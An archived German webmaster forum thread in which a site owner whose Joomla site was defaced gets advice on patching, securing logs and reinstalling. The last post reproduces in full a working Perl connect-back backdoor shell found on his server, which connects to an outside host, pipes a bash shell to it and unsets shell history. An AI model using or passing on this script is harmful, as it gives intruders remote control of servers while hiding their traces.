Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Wie kann man sich vor hackern schützen?

Hier können Sie Ihre Fragen zum Thema Suchmaschinenoptimierung (SEO) / Positionierung stellen
baynado
PostRank 6
PostRank 6
Beiträge: 354
Registriert: 25.03.2006, 11:02
Wohnort: Dresden

Beitrag von baynado » 30.06.2006, 14:19

Hallo,

ich habe gerade festgestellt, dass mein HP gehackt worden ist und jetzt irgednwelche politischen Botschaften von der PKK auf meiner Seite verbreitet werden.Was kann man gegen solchen missbrauch tun.Ausser eine neues noch längeres Passwort sich zu vergeben?
Teile Dein Wissen, so erlangst Du Unsterblichkeit.
Mein Blog baynado.de

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


Anonymous

Beitrag von Anonymous » 30.06.2006, 14:22

eigener Server?

wie sind sie reingekommen?

und die Löcher dann dicht machen...

twiggie
PostRank 8
PostRank 8
Beiträge: 887
Registriert: 30.05.2005, 09:23

Beitrag von twiggie » 30.06.2006, 14:25

Die Ebene auf der du ansetzen kannst hängt davon ab wie du deine seite hostest.
Shared Paket oder Server? Managed oder Root?
In selbiger Reihenfolge der obigen Frage steigen DEINE Möglichkeiten etwas zu tun.

Bei Shared Paketen mußt Du selber gar nicht mal schuld sein.
Twigg

Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 30.06.2006, 14:35

So, wie es aussieht, hast du einen Windows-Server.
Tjo, dieses BS ist für viele Sicherheitslücken bekannt.
Wenn du keinen guten Admin hast, hast du da recht schlechte Karten.


Du solltest immer die aktuellen Software-Release auf deinem Server haben, und fein Updates machen.
Fals deine ASP-Software eine selbstgehäkelte ist, würde ich die grösste Lücke dort vermuten.

Wichtig ist, das Loch aufzuspüren und zu stopfen. Bei vielen Löchern kommt man übrigens um eine Betriebssystem-Neuinstallation nicht umhin, da Rootkits installiert sein könnten, die dem Hacker vollen Zugang durch die Hintertür auf deinen Server erlauben.

Andreas I.
PostRank 9
PostRank 9
Beiträge: 1464
Registriert: 18.03.2006, 14:36
Wohnort: Hamburg

Beitrag von Andreas I. » 30.06.2006, 15:48

Auf alle Fälle schnell das Backup aufspielen. Gerüchtweise findet gerade ein Google-Update statt.

Metaman
PostRank 7
PostRank 7
Beiträge: 602
Registriert: 17.04.2004, 07:37
Wohnort: Wittenburg (Mecklenburg)

Beitrag von Metaman » 30.06.2006, 17:36

als erstes solltest Du nach dem Aufspielen der Updates
deine Logfiles sichern.
und zwar die direkt von deinem server, nicht das was du vielleicht im Webalizer siehst.

anhand dieser Logfiles kann man oftmals sehen wie dieser Hacker zugriff bekommen hat
Schau Dir dazu erstmal an, wann genau deine index Datei oder vielleicht auch die htaccess geändert wurde,
diese Zeit erleichtert Dir die suche in den Logfiles....

Falls Du mit Deinen Logfiles nicht klarkommst, kannst Du Dich gerne bei mir melden, hab schon einige erfahrrungen damit...

baynado
PostRank 6
PostRank 6
Beiträge: 354
Registriert: 25.03.2006, 11:02
Wohnort: Dresden

Beitrag von baynado » 30.06.2006, 22:08

Vielen Dank für die nützlichen Tipps.

Ich habe jetzt erst mal die Logfiles gesichert, und die richtige Index Datei hochgeladen, wenigstens waren diese Leute so "anständig" und haben nicht den Rest auch noch gelöscht. Ich werde mich jetzt erstmal mit meinem Hoster in Verbindung setzen.
Der Hoster ist eigentlich ein kleiner Anbieter.
Teile Dein Wissen, so erlangst Du Unsterblichkeit.
Mein Blog baynado.de

Netsrac
PostRank 2
PostRank 2
Beiträge: 35
Registriert: 11.08.2005, 18:55
Wohnort: Görlitz

Beitrag von Netsrac » 01.07.2006, 12:34

Benutzt du eine fertige Shopsoftware? Weil wenn es den Jungs einmal möglich war die index zu löschen, dann haben sie sich sicher noch irgendwelche anderen Zugänge gebaut.

Als mein Server mal gehackt wurde hab ich sofort das System komplett platt gemacht und erstmal meinen kompletten Seitencode durchgeforstet nach schwachstellen.

Man weiß nie was die für Backdoor's hinterlassen die Leute. ;)

baynado
PostRank 6
PostRank 6
Beiträge: 354
Registriert: 25.03.2006, 11:02
Wohnort: Dresden

Beitrag von baynado » 01.07.2006, 12:51

Ich habe keine Shopsoftware installiert, nur ein CMS.
Teile Dein Wissen, so erlangst Du Unsterblichkeit.
Mein Blog baynado.de

Anonymous

Beitrag von Anonymous » 01.07.2006, 13:02

hast du dein joomla auch immer aktuell gehalten? da gab es gerade ein Update um Sicherheitslücken zu schliessen:

https://www.joomla.de/news/joomla.org/j ... ase_2.html

baynado
PostRank 6
PostRank 6
Beiträge: 354
Registriert: 25.03.2006, 11:02
Wohnort: Dresden

Beitrag von baynado » 02.07.2006, 11:42

Ich habe gerade das Sicherheitsrelease aufgespielt und das Gästebuch deaktiviert.
Ich habe mich nochmal bei meinen Arbeitskollegen umgehört. Die hatten auch vor kurzem Hacker Probleme in Verbindung mit Joomla. Der eine meinte, das die über ne SQL Injection Attacke reingekommen sind.
Leider erreiche ich meinen kleinen Hoster erst ab Montag, so nen scheiß.
Ach ja, kann einer von Euch etwas mit "zone-h.org" anfangen. Ich hatte gestern ein paar verweise von dort.
Teile Dein Wissen, so erlangst Du Unsterblichkeit.
Mein Blog baynado.de

Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 02.07.2006, 23:04

Bei zone-h.org werden Seiten gelistet, die von Hackern z.B. defaced wurden.
Vielleicht ist deine Seite dort auch aufgetaucht.
Wenn ja, hast du nun einige Zeit alle Möchtegern-Hacker auf dem Hals, d.h. immer schön Sicherheitsupdates installieren und Logs beobachten.

oldInternetUser
PostRank 9
PostRank 9
Beiträge: 1250
Registriert: 19.03.2005, 12:52

Beitrag von oldInternetUser » 02.07.2006, 23:31

Pompom hat geschrieben:So, wie es aussieht, hast du einen Windows-Server.
Tjo, dieses BS ist für viele Sicherheitslücken bekannt.
Wenn du keinen guten Admin hast, hast du da recht schlechte Karten.
Tja, das Problem hatte nichts mit Windows, sondern mit einer OpenSource-Software in Kombination mit einem nicht rechtzeitig aufgespielten Patch zu tun.

Bei Microsoft-Produkten passiert das nicht so leicht - da aktiviert man das automatische Update und wird dann informiert, falls ein neuer Patch da ist.

ff-webdesigner
PostRank 6
PostRank 6
Beiträge: 433
Registriert: 30.01.2004, 07:34
Wohnort: Regensburg

Beitrag von ff-webdesigner » 03.07.2006, 10:07

kann ich mich nur anschliessen: joomla alt + windows = schlaraffenland für jedes scriptkiddie. unbedingt alles löschen, logs sichern, komplett neu installieren + alle patches....hatte ähnliche mal mit einer gehackten version von phpbb....wenn man sowas vorkonfiguriertes nutzt: am besten alle paar wochen nach updates suchen, is wichtig!
ff-webdesigner.de: Webdesign aus Regensburg und München

Suche keine Linkpartner oder indische SEOs!

baynado
PostRank 6
PostRank 6
Beiträge: 354
Registriert: 25.03.2006, 11:02
Wohnort: Dresden

Beitrag von baynado » 03.07.2006, 10:14

Habe jetzt schon mehrfach Angriffe gehabt. Hier einmal ein Auszug aus einer Datei die mir aufgespielt wurde.Weiß einer von Euch was das Bedeutet:
#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

Mein Hoster ist jetzt dran und ich habe jetzt sämtliche Sicherheitsupdates gefahren.
Teile Dein Wissen, so erlangst Du Unsterblichkeit.
Mein Blog baynado.de

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag